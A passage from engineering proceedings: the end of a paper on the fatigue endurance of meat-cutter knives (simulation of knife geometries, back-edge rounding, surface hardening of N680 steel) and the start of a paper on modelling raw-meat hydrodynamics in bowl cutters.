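W <- Q * (h1 - h0)   # Eq. (1): energy difference, 60 J
a <- W / A           # Eq. (2): impact toughness, 75 J/cm^2
a
```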
Fig. 9. Appearance of test specimens for impact test: (a) ordinary specimen; (b) surface reinforced with high-frequency mechanical forging; (c) surface reinforced by pulse-plasma treatment
4 Results 4.1 Investigation of the Endurance Limit of Cutter Knives Under Alternating Loads by Simulation In order to study the influence of the geometric shape of the cutter knife on its resistance to fatigue failure and to develop recommendations for rational knife design, simulation of knife endurance under alternating loads has been performed. The results are presented in Figs. 10, 11 and 12. The results obtained in the simulation show the following. The lowest endurance limits are shown by knives of the following brands: "Laska universal" – 2.2·10⁴ cycles; "Laska for smoked sausages" – 2.2·10⁴ cycles; Seydelmann – 2.4·10⁴ cycles. Knives of other brands have much higher endurance: Alpina – 4.2·10⁵ cycles; Kilia – 1·10⁶ cycles and above; L5-FKB – 1·10⁶ cycles and above. At the same time, on average, knives of modern cutters can accumulate up to 2.3·10⁶ cycles before being taken out of service. As follows from the results, the geometric shape significantly affects the durability of cutter knives under alternating loads. The Seydelmann knife (2.49·10³ deformation cycles, Fig. 10, (a)) has the shortest service life; the Kilia knife (16.2·10³ deformation cycles, Fig. 10, (b)) has a slightly longer one. In ascending order follow the "Laska universal" knife (21.7·10³ deformation cycles, Fig. 11, (a)), "Laska for smoked sausages" (24.2·10³ deformation cycles, Fig. 11, (b)), Alpina (545.2·10³ deformation cycles, Fig. 12, (a)) and L5-FKB (663.2·10³ deformation cycles, Fig. 12, (b)). The Kilia, "Laska universal" and "Laska for smoked sausages" knives have an order of magnitude longer service life than the Seydelmann knife, while the service life of the Alpina and L5-FKB knives is one order of magnitude longer than that of Kilia, "Laska universal" and "Laska for smoked sausages", and two orders of magnitude longer than Seydelmann's. The following should be noted here. Some of the presented brands of knives (Seydelmann, "Laska for smoked sausages") are intended specifically, and only, for the production of minced meat for smoked sausages. This means that, according to the requirements of food technology, such knives rotate about 2 times slower during the main stage of grinding than knives used in the manufacture of cooked sausages or universal knives. Therefore, smoked sausage knives will work about twice as many shifts as cooked sausage knives with the same service life measured in the number of deformation cycles before fatigue destruction. But this admittedly significant difference is
Fig. 10. The results of numerical simulation of the service life of cutter knives under alternating loads (number of cycles of deformation to failure): (a) Seydelmann brand knife; (b) Kilia brand knife
Fig. 11. The results of numerical simulation of the service life of cutter knives at alternating loads (number of load cycles): (a) “Laska universal” brand knife; (b) “Laska for smoked sausages” knife
not enough to cover a difference of one or two orders of magnitude in the service life of these knives. The considered knife designs can therefore be ranked in order of increasing durability under alternating loads: Seydelmann, Kilia, "Laska universal", "Laska for smoked sausages", Alpina, L5-FKB. Also, to assess the influence of the geometry of the back edge of the knife on its endurance, well-known technical means of improving the fatigue endurance of parts have been applied – reducing the stress concentration in critical areas by rounding or chamfering the part's surfaces. In
Fig. 12. The results of numerical simulation of the service life of cutter knives under sign loads (number of load cycles): (a) Alpina brand knife; (b) L5-FKB brand knife
this case, the stress concentration on the edges of the back face was changed by applying to them:
• rounding with radius R;
• a chamfer of size C;
• rounding of both edges in the form of a horizontal ellipse of 4.00 × 2.50 mm;
• rounding of both edges in the form of a vertical ellipse of 2.50 × 1.50 mm.
Visualization of the simulation results for a particular case (the Seydelmann brand knife) is shown in Fig. 13. The simulation results are shown in Figs. 14, 15, 16, 17, 18 and 19. It has been established that for the Seydelmann knife (Fig. 14), the use of a rounding radius R from 0.5 mm to 2.5 mm (with a knife thickness of 5 mm) increases the initial life from 2.49·10³ deformation cycles to values from 2.63·10³ to 2.87·10³ deformation cycles. The maximum life is observed at the maximum rounding radius R = 2.5 mm. The use of a chamfer C with a value from 0.5 mm to 2.5 mm increases the initial life to values from 2.64·10³ to 2.88·10³ deformation cycles, with the maximum observed at a chamfer of C = 2.0 mm. The use of rounding in the form of an ellipse increases the life of the knife to 2.78·10³ deformation cycles (horizontal ellipse 6.25 × 2.50 mm), 2.86·10³ deformation cycles (horizontal ellipse 4.00 × 2.50 mm) and up to the maximum value of 2.92·10³ deformation cycles (vertical ellipse 2.50 × 1.50 mm). For the Kilia brand knife (Fig. 15), the nature of the results is different. Since the maximum stresses, unlike in most of the considered knives, are observed in zone 2 (according to Fig. 3), a decrease in stress concentration on the back face (in zone 1) does not increase the service life of the knife itself. Nevertheless, it is useful to consider the impact of chamfering the back edge on the life of the metal in zone 1 of the knife (according to Fig. 3). The use of both a radius R and a chamfer C of 0.5 to 2.5 mm leads to an increase in the initial service life from 1.00·10⁶ deformation cycles to values from 1.02·10⁶ to 1.07·10⁶ deformation cycles. The use of rounding in the form of an ellipse increases
Fig. 13. The results of numerical simulation of the service life of Seydelmann brand knives under alternating loads (the number of loading cycles to destruction) and with different design implementation of the back face: (a) rounding R = 2.50 mm; (b) chamfer C = 2 × 45°; (c) horizontal ellipse 6.25 × 2.50 mm; (d) vertical ellipse 2.5 × 1.50 mm
the service life of the knife to 1.04·10⁶ deformation cycles (horizontal ellipse 6.25 × 2.50 mm), 1.06·10⁶ deformation cycles (horizontal ellipse 4.00 × 2.50 mm) and up to the maximum value of 1.08·10⁶ deformation cycles (vertical ellipse 2.50 × 1.50 mm). For the "Laska universal" knife (Fig. 16), the use of a rounding radius R of 0.5 mm to 2.5 mm increases the initial service life from 2.17·10⁴ deformation cycles to values from 2.18·10⁴ to 2.33·10⁴ deformation cycles. The maximum service life is observed at the maximum rounding radius R = 2.5 mm. The use of a chamfer C with a value of 0.5 mm to 2.5 mm increases the initial service
Fig. 14. The results of numerical simulation of the number of cycles of deformation to destruction of a Seydelmann knife (knife service life) with various geometric parameters of the back face: (a) when using rounding (1) and chamfer (2); (b) for a standard knife (1), when using a horizontal ellipse 6.25 × 2.50 mm (2), when using a horizontal ellipse 4.00 × 2.50 mm (3), when using a vertical ellipse 2.50 × 1.50 mm (4)
Fig. 15. The results of numerical simulation of the number of cycles of deformation to failure of a knife (knife service life) of Kilia brand for various geometric parameters of the back face: (a) when using rounding (1) and chamfer (2); (b) for a standard knife (1), when using a horizontal ellipse 6.25 × 2.50 mm (2), when using a horizontal ellipse 4.00 × 2.50 mm (3), when using a vertical ellipse 2.50 × 1.50 mm (4)
life to values from 2.18·10⁴ to 2.31·10⁴ deformation cycles, with the maximum observed at a chamfer of C = 2 mm. The use of rounding in the form of an ellipse increases the service life of the knife to 2.26·10⁴ deformation cycles (horizontal ellipse 6.25 × 2.50 mm), 2.29·10⁴ deformation cycles (horizontal ellipse 4.00 × 2.50 mm) and up to the maximum value of 2.34·10⁴ deformation cycles (vertical ellipse 2.50 × 1.50 mm). For the "Laska for raw smoked sausages" knife (Fig. 17), the use of a rounding radius R of 0.5 to 2.5 mm increases the initial service life from 2.42·10⁴ deformation cycles to values from 2.56·10⁴ to 2.78·10⁴ deformation cycles. The maximum service life is observed at the maximum rounding radius R = 2.5 mm. The use of a chamfer C of 0.5 to 2.5 mm increases the initial service life to values from 2.56·10⁴ to 2.75·10⁴ deformation cycles, with the maximum observed at a chamfer of C = 2 mm. The use of rounding in the form of an ellipse increases the service life of the knife to 2.68·10⁴ deformation cycles (horizontal ellipse 6.25 × 2.50 mm), 2.79·10⁴ deformation cycles (for a horizontal
Fig. 16. The results of numerical simulation of the number of cycles of deformation to failure of a knife (knife service life) of "Laska universal" brand with different geometric parameters of the back face: (a) when using rounding (1) and chamfer (2); (b) for a standard knife (1), when using a horizontal ellipse 6.25 × 2.50 mm (2), when using a horizontal ellipse 4.00 × 2.50 mm (3), when using a vertical ellipse 2.50 × 1.50 mm (4)
ellipse 4.00 × 2.50 mm) and up to the maximum value of 2.83·10⁴ deformation cycles (vertical ellipse 2.50 × 1.50 mm).
Fig. 17. The results of numerical simulation of the number of cycles of deformation to destruction of a knife (knife service life) of “Laska for raw smoked sausages” brand with different geometric parameters of the back face: (a) when using rounding (1) and chamfer (2); (b) for a standard knife (1), when using a horizontal ellipse 6.25 × 2.50 mm (2), when using a horizontal ellipse 4.00 × 2.50 mm (3), when using a vertical ellipse 2.5 × 1.50 mm (4)
For the Alpina brand knife (Fig. 18), the nature of the results is similar to that of the Kilia knife. Since the maximum stresses are observed in zone 2 (according to Fig. 3), reducing the stress concentration on the back face (in zone 1) does not increase the service life of the knife itself. However, the use of both a rounding radius R and a chamfer C of 0.5 mm to 2.5 mm increases the initial service life of the metal in zone 1 of the knife (according to Fig. 3) from 1.00·10⁶ deformation cycles to values from 1.02·10⁶ to 1.07·10⁶ deformation cycles. The use of rounding in the form of an ellipse increases the service life of the knife to 1.04·10⁶ deformation cycles (horizontal ellipse 6.25 × 2.50 mm), 1.06·10⁶ deformation cycles (for a
horizontal ellipse 4.00 × 2.50 mm) and up to a maximum value of 1.08·10⁶ deformation cycles (vertical ellipse 2.50 × 1.50 mm).
Fig. 18. The results of numerical simulation of the number of cycles of deformation to destruction of Alpina brand knife (knife service life) with different geometric parameters of the back face: (a) when using rounding (1) and chamfer (2); (b) for a standard knife (1), when using a horizontal ellipse 6.25 × 2.50 mm (2), when using a horizontal ellipse 4.00 × 2.50 mm (3), when using a vertical ellipse 2.5 × 1.50 mm (4)
For the L5-FKB knife (Fig. 19), the use of a rounding radius R of 0.5 mm to 2.5 mm increases the initial service life from 6.63·10⁵ deformation cycles to values from 6.76·10⁵ to 7.10·10⁵ deformation cycles. The maximum service life is observed at the maximum rounding radius R = 2.5 mm. The use of a chamfer C of 0.5 mm to 2.5 mm increases the initial service life to values from 6.76·10⁵ to 7.08·10⁵ deformation cycles, with the maximum observed at a chamfer of C = 2.0 mm. The use of rounding in the form of an ellipse increases the service life of the knife to 6.88·10⁵ deformation cycles (horizontal ellipse 6.25 × 2.50 mm), 7.01·10⁵ deformation cycles (horizontal ellipse 4.00 × 2.50 mm) and up to a maximum value of 7.16·10⁵ deformation cycles (vertical ellipse 2.50 × 1.50 mm). The obtained results indicate that the shortest service life is typical for knives with the smallest body width along the side surface, as well as for those with a pronounced hollow on the back edge (Fig. 10, a; Fig. 11). The geometric shape of the cutting edge and of the back edge of the knife, as well as the width of its body, determine in which of the two zones (1 or 2 in accordance with Fig. 3) the maximum stresses will occur. Thus, in knives of the Seydelmann, "Laska universal", "Laska for raw smoked sausages" and L5-FKB brands, the maximum stresses are observed in zone 1, whereas in knives of the Kilia and Alpina brands the maximum stresses occur in zone 2, which is caused by the small curvature of the cutting edge and the significant width of the knife body: there is no stress concentrator in the form of a pronounced depression on their back face, and the wide body takes the increased pressure, on the side surface of the knife, of the raw material fed by the cutter bowl. In general, it can be concluded that for cutter knives it is beneficial to increase the width of the body in order to reduce peak stresses in the hollow area on the back
Fig. 19. The results of numerical simulation of the number of deformation cycles to failure of the L5-FKB brand knife (knife service life) with various geometric parameters of the back face: (a) when using rounding (1) and chamfer (2); (b) for a standard knife (1), when using a horizontal ellipse 6.25 × 2.50 mm (2), when using a horizontal ellipse 4.00 × 2.50 mm (3), when using a vertical ellipse 2.50 × 1.50 mm (4)
In general, it can be concluded that for cutter knives it is beneficial to increase the width of the body in order to reduce the peak stresses in the area of the depression on the back edge. Moreover, according to the results of studies [19, 20], an increase in the width of the knife body does not noticeably impair the quality of minced meat processing for raw smoked and cooked sausages. Taking this into account, for the Seydelmann, Kilia, “Laska universal” and “Laska for raw smoked sausages” knives we can recommend the following design modification, aimed at increasing the width of the knife body (Fig. 20).
Fig. 20. Modification of the design of knives, aimed at increasing their fatigue endurance in line with the identified trends: (a) Seydelmann; (b) Kilia; (c) “Laska universal”; (d) “Laska for raw smoked sausages”
4.2 Experimental Studies of the Influence of Hardening Treatment Technologies on the Endurance of Steel Samples

In accordance with the method described above, experimental studies of the fatigue endurance of cutter knives, the design of which is shown in Fig. 2, have been carried out. The results of the experimental studies and the results of mathematical modelling of fatigue endurance differ by no more than 8%, which makes it possible to consider the results of the mathematical modelling adequate. In addition, an experimental study has been carried out on the endurance of samples manufactured using the cutter knife production technology, as well as of samples strengthened by pulsed plasma processing and by high-frequency mechanical forging. The results obtained are presented in Fig. 21.
Fig. 21. Fatigue curves for specimens made of N680 steel: 1 – ordinary specimen; 2 – strengthened by pulsed-plasma treatment; 3 – strengthened by high-frequency mechanical forging
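For readers who wish to compare such curves quantitatively: fatigue curves of this kind are conventionally summarized by Basquin's relation. The form below is a standard textbook parameterization given for orientation; it is not a fit reported in this paper.

```latex
% Basquin's relation for the finite-life part of a fatigue (S-N) curve:
%   \sigma_a  - stress amplitude,
%   N         - number of cycles to failure,
%   \sigma_f' - fatigue strength coefficient, b - fatigue strength exponent
%   (material constants fitted to a measured curve such as those in Fig. 21).
\[
  \sigma_a = \sigma_f' \,(2N)^{b}
\]
```

In these terms, the upward shift of curve 3 relative to curve 1 corresponds to a higher effective σf′ at a broadly similar slope b, which is consistent with the compressive residual stresses introduced by the forging treatment.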
The study of the impact strength of ordinary and hardened samples of N680 steel establishes that the impact strength KCU of the hardened samples is in the range of 72–74 J/cm², which is at most 5% lower than that of the control sample. This allows us to consider it expedient to surface-harden cutter knives by high-frequency mechanical forging, since the impact strength of the knives does not noticeably deteriorate in this case. An analysis of the known methods of hardening cutter knives has shown that the existing heat treatment methods cannot meet a number of requirements that, in a certain sense, contradict one another: high knife hardness (to ensure increased wear resistance of the blade, increased fatigue endurance of the body and improved corrosion resistance) and, at the same time, increased toughness of the knife body in order to improve the resistance of the knife to impact loads during high-speed cutting. In order to solve this problem, we have developed a new way to harden cutter knives (Fig. 22). It consists in the following: first, the entire knife is annealed to the full depth; then it is normalized, or quenched and tempered, to a hardness of HB 200–350 to the full depth. After that, the blade 1 is hardened to the full depth to a hardness of HRCe 52–66 with appropriate tempering (for example, by induction hardening with high-frequency currents, plasma hardening, etc.).
Fig. 22. The design of the cutter knife strengthened according to the developed method: (a) general view of the knife; (b) cross section of the working part of the knife; (c) cross section of the landing part of the knife; 1 – blade; 2 – working part; 3 – landing part; 4 – rear edge; 5 – surface layers of the working part; 6 – core.
Then the surfaces of the other parts of the knife, 4 and 5, are strengthened to a depth of 0.03–2 mm by high-frequency mechanical forging. Next, all surfaces of the knife are polished, including the blade 1, the working part 2, the landing part 3 and the rear edge 4, which is designed to mix the raw materials during reverse rotation of the knife. Hardening of the blade 1 increases its wear resistance. Normalization or quenching and tempering of the core 6 of the landing part 3 and of the working part 2 of the knife increases its toughness, which is favorable for the working conditions of the knife when cutting. Strengthening the surface layers 5 of the working part 2 increases the fatigue strength and corrosion resistance of these areas. Strengthening the surface layers 5 of the landing part 3 increases their resistance to corrosion and to wear under fretting conditions. Polishing all surfaces of the knife increases their fatigue endurance and corrosion resistance. As a result, the most effective combination of the working properties of the cutter knife becomes possible in comparison with known analogues.
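For clarity, the whole route can be laid out as a sequence. The following Python sketch is purely illustrative bookkeeping of the steps described above: the field labels are ours, the part numbers refer to Fig. 22, and the depth and hardness values are quoted from the text.

```python
# Illustrative summary of the developed hardening route for a cutter knife.
# Part numbers refer to Fig. 22; values are quoted from the description above.
hardening_route = [
    ("anneal entire knife",                               "full depth", None),
    ("normalize or quench-and-temper",                    "full depth", "HB 200-350"),
    ("harden blade 1 (e.g. induction, plasma) + temper",  "full depth", "HRCe 52-66"),
    ("high-frequency mechanical forging of parts 4 and 5", "0.03-2 mm", None),
    ("polish all surfaces (1, 2, 3 and 4)",               "surface",    None),
]

for step, (operation, depth, hardness) in enumerate(hardening_route, start=1):
    note = f", target hardness {hardness}" if hardness else ""
    print(f"step {step}: {operation} ({depth}{note})")
```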
5 Discussion

In summary, it can be noted that all the studied design methods of reducing stress concentration can provide a significant increase in the service life of knives. Rounding in the form of a vertical ellipse of 2.5 × 1.5 mm has the highest efficiency (it adds 17% of endurance); however, such geometry complicates the manufacture of the knife and, consequently, increases its price. The use of a chamfer of C = 2 mm increases endurance by 16% and reduces the cost of processing the back face. The use of rounding with a radius of R = 2.5 mm increases endurance by 15%. Ultimately, the choice of one or another rounding method should be based on the technological capabilities of the enterprise producing cutter knives. If the enterprise has CNC milling machines, it is advisable to use a chamfer on the back edge, which is easy to obtain by machining despite the complex configuration of the back edge of the knife. If the reduction in stress concentration is to be implemented manually, it is better to choose a rounding with a radius R or in the form of a vertical ellipse, which is quite easy to produce by processing the rear edge of the knife with an abrasive wheel while feeding the knife into the processing zone by hand.

It has been established (Fig. 21) that high-frequency mechanical forging makes it possible to increase the endurance of N680 steel up to 2.5 times, which is explained by the creation of compressive stresses in the surface layer of the metal. At the same time, pulse-plasma strengthening reduces endurance by a factor of 3–3.5. This is explained by the fact that, despite the formation of compressive stresses in the surface layer of the metal, the endurance of the samples decreases sharply due to microcracks that form in the surface layer because of its excessively intense heating during pulsed plasma hardening.

The results presented in the article, such as the dependence of the durability of cutter knives on the geometric shape of their blade and back edge, differ from similar results obtained by other researchers in that they are obtained for knives of different models (from different industrial manufacturers) that are most often used in practice. The value of the obtained results lies in the fact that they can serve as a basis for choosing the most rational structural forms and for predicting the durability of knives of new designs that may be developed in the near future. However, during the mathematical modelling, the properties of the knife material and the properties of its surface layer were not varied. Addressing these issues in the future will make it possible to develop sufficiently detailed mathematical models, the use of which will create prerequisites for the effective and rapid design of new knives with high work efficiency and increased endurance under alternating loads.

The results of the mathematical modelling that reveal the dependence of knife durability on the type of rounding of the back edge have no direct analogues, since similar studies have not been reported in the known works at all. In addition to their scientific novelty, the obtained results also have high practical value, since such an inexpensive technological technique as rounding the back edge can increase the fatigue life of knives significantly, by up to 17%.
At the same time, the grade of the knife material and its thickness, and therefore its cost, may remain unchanged.
Other authors have not investigated the influence of high-frequency mechanical forging and pulse-plasma hardening on the fatigue strength of cutter knives. The results obtained in the article are therefore important both from the point of view of scientific novelty and of practical value. However, it would be useful to study the effectiveness of treating knives by high-frequency mechanical forging only in certain zones, in the places of greatest stress concentration (zones 1 and 2 in Fig. 3). Such treatment would be significantly cheaper and, at the same time, sufficiently effective. It is relevant to continue research in the directions covered in this article.
6 Conclusions

The article presents the results of a set of studies identifying the influence of structural and technological factors on the fatigue endurance of cutter knives, as well as recommendations for its improvement.

The scientific novelty of the presented work is as follows. For the first time, the regularities of the influence of the geometric parameters of cutter knives on their fatigue endurance have been established. It has been proven that increasing the width of the knife body and reducing the concavity of the back edge of the knife contribute to a significant increase in its fatigue endurance. For the first time, the regularities of the dependence of the fatigue endurance limit of cutter knives under alternating loads on the type of strengthening treatment and on the features of the geometric shape of the knives have been obtained. High-frequency mechanical forging makes it possible to increase the durability of N680 steel up to 2.5 times, while pulse-plasma hardening reduces durability by a factor of 3–3.5.

The practical value of the research results presented in the article is as follows. A set of recommendations for increasing the fatigue endurance of knives is offered. For cutter knives, it is beneficial to increase the width of the body in order to reduce the peak stresses in the area of the depression on the rear face and to increase fatigue endurance. The developed method of strengthening cutter knives makes it possible to obtain the best combination of operational and technological properties in comparison with analogues, owing to the special heat treatment of the knife surfaces and the application of surface strengthening by high-frequency mechanical forging.

Further research should be devoted to the search for new conceptual design solutions for cutter knives based on modern information about the hydrodynamics of meat raw materials in the cutter. New designs of pre-assembled knives will make it possible to significantly increase their fatigue endurance and operational reliability without impairing the quality of processing of meat raw materials.
References

1. Kolev, E., Stoyanov, S.: Verifikationsmethode zur Bestimmung der Belastung an Bauteilen durch Simulation und Experiment. Int. Wissenschaftliches Kolloquium 47, 23–26 (2002)
2. Moser, M.: Ermüdungsbruch von Fleischhackmessern. Kuttermesser (2010). http://martinmoeser.de/Veroeffentlichungen/Bruch_Kuttermesser.pdf. Accessed 30 Mar 2010
3. Markus, L.I., Shatalov, A.N., Ananyev, R.A., Smirnov, A.B.: Computer modeling of the causes of emergency breakage of knives of high-speed cutters. Myasnaya Industr. 8, 19–21 (2010)
4. Nekoz, A.I., Venglovskyi, O.L., Batrachenko, A.V.: Durability of cutter assemblies and its causative factors. Foods Raw Mater. 6, 358–370 (2018)
5. Kokanda, S.: Fatigue Cracking of Metals: Monograph. Metallurgiya, Moscow (1990)
6. Arutyunyan, A.R.: Corrosion crack growth and fatigue strength of complex technical systems. Inzh.-Stroitelnyiy Zh. 9, 42–48 (2013)
7. Stukach, V.N.: Study of the corrosion-fatigue strength of materials for press rolls of paper machines. Vestn. IzhGTU 3(55), 15–17 (2012)
8. Romano, S., Brückner-Foit, A., Brandão, A., Gumpinger, J., Ghidini, T., Beretta, S.: Fatigue properties of AlSi10Mg obtained by additive manufacturing: defect-based modelling and prediction of fatigue strength. Eng. Fract. Mech. 187, 165–189 (2018)
9. Kamaya, M., Kawakubo, M.: Mean stress effect on fatigue strength of stainless steel. Int. J. Fatigue 74, 20–29 (2015)
10. Zerbst, U., Vormwald, M., Pippan, R., Gänser, H., Sarrazin-Baudoux, C., Madia, M.: About the fatigue crack propagation threshold of metals as a design criterion – a review. Eng. Fract. Mech. 153, 190–243 (2016)
11. Agrawal, A., Deshpande, P.D., Cecen, A., Basavarsu, G.P., Choudhary, A.N., Kalidindi, S.R.: Exploration of data science techniques to predict fatigue strength of steel from composition and processing parameters. Integrating Mater. Manufact. Innov. 3(1), 90–108 (2014). https://doi.org/10.1186/2193-9772-3-8
12. Zerbst, U., Madia, M., Beier, H.: A model for fracture mechanics based prediction of the fatigue strength: further validation and limitations. Eng. Fract. Mech. 130, 65–74 (2014)
13. Madia, M., Zerbst, U.: Application of the cyclic R-curve method to notch fatigue analysis. Int. J. Fatigue 82, 71–79 (2016)
14. Beretta, S., Romano, S.: A comparison of fatigue strength sensitivity to defects for materials manufactured by AM or traditional processes. Int. J. Fatigue 94, 178–191 (2017)
15. Caligulu, U.: The fatigue strength of AISI 430–304 stainless steels welded by CO2 laser beam welding. Metallphysycs 6, 839–852 (2015)
16. Vishnepolskiy, E.V., Puhalskaya, G.V., Glikson, I.L.: Increasing the fatigue resistance of stress concentration points in cylindrical shells by diamond burnishing. Vestn. Dvigatelestroyenia 1, 90–94 (2009)
17. Knyish, V.V., Solovey, S.A.: Increasing the Durability of Welded Joints with Fatigue Damage: Monograph. KPI im. Igorya Sikorskogo, Kiev (2017)
18. Tyurin, Y.N., Zhadkevich, M.L.: Plasma Hardening Technologies. Naukova dumka, Kiev (2008)
19. Schnackel, W., Micklisch, I., Krickmeier, J.: Untersuchungen zur Optimierung von Kuttermessern. 3. Optimierungen der Kuttermesserform zur Herstellung von Brühwürsten. Fleischwirtschaft 6, 86–102 (2008)
20. Schnackel, W., Micklisch, I., Krickmeier, J.: Optimisation of cutter knives for the production of cooked sausages. Food Science, Engineering and Technologies, Plovdiv (2008)
Modelling of Hydrodynamics of Meat Raw Materials When Crushing It in Meat Cutting Machines

Olexandr Batrachenko(B)

Cherkasy State Technological University, Cherkasy, Ukraine
[email protected]
Abstract. The aim of the work is to study by numerical methods the hydrodynamics of raw materials during grinding in bowl cutters, meat grinders and emulsifiers, in order to justify new ways to increase the productivity of these machines. Numerical modelling of the parameters of raw meat movement in the bowl cutter has been performed using the SolidWorks FlowSimulation software package. The raw material, after being thrown off by the knives at high speed, leaves the grinding zone at an angle of 20°–35° to the axis of rotation of the knives. The flow of raw material then hits the wall of the bowl and moves along its walls and lid. The presence in the bowl cutter of a distinct zone into which the high-speed knives throw the raw material makes it possible to place static knives in this zone, intensifying the cutting process without additional energy consumption.

Keywords: Simulation · bowl cutter · knives · hydrodynamics · capacity · durability
1 Introduction

The development and improvement of technology is a process of continuous transfer of the economy to a new level of technology and of society to a new stage of technological progress. In this context, a necessary condition for the successful development of the food industry is the improvement of technological equipment in order to increase the efficiency of processing raw materials and reduce operating costs. It is especially important to fulfill these requirements in the meat processing industry. The high cost of raw materials necessitates high-quality processing in order to reduce losses, while the widespread use of grinding operations, their significant energy consumption and the specific effect of the properties of raw materials on the wear of working bodies cause significant operating costs for the maintenance and repair of process equipment. Our analysis shows that in modern models of cutters, the specific productivity (productivity related to the diameter of the cutting unit of the machine), the quality of processing of raw materials (the temperature rise of the raw materials during grinding, their moisture content), the durability of the working bodies and the energy consumption of operation (kW·h/kg) all remain problematic.
We put forward a hypothesis that certain features of the hydrodynamics of raw materials in the working area of cutters significantly reduce their maximum achievable specific productivity and degrade the quality of the semi-finished products obtained. The specific nature of the movement of raw materials and their physical and mechanical properties have a significant impact on the wear resistance, strength and fatigue endurance of the working bodies. The study and proper consideration of these phenomena will increase the output of meat products without increasing capital and operating costs for the maintenance of technological equipment, and will improve the quality of raw material processing. Increasing the durability and reducing the metal consumption of the working bodies will increase the actual productivity of machines by reducing the number of unscheduled repairs. It will also be possible to reduce the existing operating costs for the cutting tool, which for these types of equipment are significantly high.

This work is based on the concept of improving machines for grinding meat raw materials, previously developed by the author, which relies on the systemic mutual coordination of the processes of supplying raw meat and the processes of its grinding. The essence of the concept is that the parameters of the feeding and grinding systems are determined and coordinated so as to ensure the maximum overall efficiency of the process, including the stress-strain state of the working bodies (knives). This work is devoted to these aspects.

The following scientific works are devoted to the study of these problematic issues. The article [1] assesses the microstructural, physicochemical and organoleptic properties of buffalo patties made using various mixing equipment (bowl cutter, universal mixer and meat grinder). Scanning electron microscopy has revealed a more homogeneous emulsion, a more cohesive structure and a smaller pore size of patties cooked using a bowl cutter, which significantly reduces the overall liquid release, water release, fat release and cooking loss compared to the universal mixer and mincer. The production of buffalo meat patties using the bowl cutter also improves the moisture retention and gel strength of the patties.

The aim of the study [2] is to develop a mathematical model for mixing salt and meat in a bowl cutter and to test it with experimental data. The theoretical model has shown that 30 rotations of the bowl are enough to obtain the salt concentration in the entire mass of meat with a deviation between the maximum and minimum values of about 5%. Comparison of the theoretically predicted salt gradient with the experimental results has shown that the developed mathematical equation is suitable for describing the process. However, the hydrodynamics of meat in the cutter is not studied in this article.

Of considerable interest are the results of a study of the efficiency of individual knives in the cutter head [3, 4]. The authors have used high-speed filming of the cutting head operation. Despite the significance of the results obtained, they are characterized by such shortcomings as the low information content of these publications and the inability to explain the results of experimental studies of the efficiency of knives [3, 4, 6].
According to these results, the knives installed in the first cutting plane account for about 50% of the cutter's productivity, and the knives installed in the other two cutting planes together account for the remaining 50%.
A significant number of works have been devoted to the study of temperature increase during cutting. The researchers in [7] use thermal imaging devices, in contrast to electrical contact thermometers. This allows them to establish the temperature distribution of both the raw materials and the structural parts of the cutter (knives, bowl lid). The aim of the research is to identify the main factor leading to the heating of minced meat by the knives. However, the authors note that they have not established a clear relationship between the friction of the knives on the raw materials and the degree of heating observed during cutting. In our opinion, the probable reason for this is that the researchers do not take into account such a heating factor as the intense friction and impact of the minced meat against the walls of the bowl and the cover of the cutter head after it is thrown off by the knife blades during grinding. A proper study of these problematic tasks remains very relevant.

In the works [8, 9], the results of studies of the influence of the shape and width of the blade of cutter knives on the performance of the cuttering process and the quality of the minced meat obtained are given. It has been established that an increased knife width leads to increased heating of the minced meat and to a softer consistency of the product, which is a negative factor. These results should be taken into account when developing new knife designs with increased work efficiency.

The authors of [10] propose a new configuration of the knife of a meat chopping machine and investigate the efficiency of its use. The main idea of the design is to coordinate the locations of the blades with the areas of the main flows of meat raw materials in this machine. However, it is impossible to apply these solutions directly to cutter knives.

In [11], the results of studies on the use of a new type of device for supplying meat raw materials to the cutting set of the machine are presented. In the developed design, the number of zones of intensive supply of meat raw materials is doubled, which results in an increase in productivity without increasing the diameter of the cutting set.

In [12], the results of mathematical modelling and experimental studies of the hydrodynamics of meat raw materials in a meat cutting machine are presented. It is shown that the design and kinematic parameters of the feeding unit and the cutting set have a significant impact on the performance of the meat cutting machine. The authors of [13] have studied the efficiency of supplying raw meat to the cutting set of a meat cutting machine using a device based on a metal sleeve with spiral holes. It has been established that this device is capable of efficiently supplying meat raw materials, despite the lower cost of its manufacture compared to standard devices. In the works [13, 15], the parameters of the process of supplying raw materials through the elements of the cutting set are investigated.

Despite the importance and weight of the results of the above works, they cannot be considered exhaustive or capable of increasing the productivity of the cutter, improving the quality of processing of raw materials in it, reducing the energy consumption of the cuttering process and increasing the durability of its cutting set.

The works [16, 17] are devoted to the study of the durability of cutter knives.
In [16], a list of factors responsible for the insufficient strength of knives is given; attention is focused on the presence of two main zones of stress concentration in knives, one of which lies on the back edge of the knife. This information is extremely important for making decisions on the design improvement of knives, but the authors of [16] do not provide such decisions in the article itself. The work [17] presents the results of mathematical modelling of the stress-strain state of cutter knives; however, it does not correlate the parameters of the process of supplying meat raw materials to cutters with the parameters of the stress-strain state of the knives. Nor do the authors propose ways to increase the static strength of cutter knives.

In general, it can be stated that the known literature does not contain the results of studies that could increase the productivity of the cutter, improve the quality of processing of raw materials in it, reduce the energy consumption of the cuttering process and increase the durability of knives through the mutual coordination of the processes of feeding and grinding meat in the cutter.

The aim of the work is to substantiate, with the help of numerical and full-scale experiments, new ways to increase the productivity of the cutter, improve the quality of processing of raw materials in it, reduce the energy consumption of the cuttering process and increase the durability of knives by coordinating the processes of feeding and crushing meat in cutters. To achieve this goal, the following tasks are set:

– to analyze well-known studies on improving the efficiency of the process of grinding meat raw materials in a cutter;
– to develop methods for studying the processes occurring during the interaction of the working bodies of the cutter with raw meat during its grinding;
– to establish the features of the hydrodynamics of meat raw materials in the working area of the cutter;
– to propose a method for coordinating the parameters of the processes of feeding and grinding meat raw materials in order to increase the productivity of the cutter, improve the quality of processing of raw materials in it, and reduce the energy consumption of the cuttering process;
– to reveal the regularities of the influence of the parameters of the interaction of cutter knives with meat raw materials on their stress-strain state;
– to develop new designs of cutter knives with increased efficiency of raw material processing and increased strength.

Objects of Study: The processes of feeding and grinding meat raw materials in cutters, and the stress-strain state of their knives.

Subject of Study: Regularities of the influence of the design and kinematic characteristics of the working bodies of cutters on the hydrodynamics of the raw material and the process of its grinding, their interdependence and mutual coordination, and their influence on the efficiency of cutting and the stress-strain state of the working bodies (knives).
2 Materials and Methods

The basis of this work is the results obtained in the numerical simulation of the processes accompanying the operation of the cutter. To verify the results obtained, full-scale experimental studies are carried out on industrial equipment (cutters) in the conditions of an operating meat processing enterprise. The research methods are therefore divided accordingly.
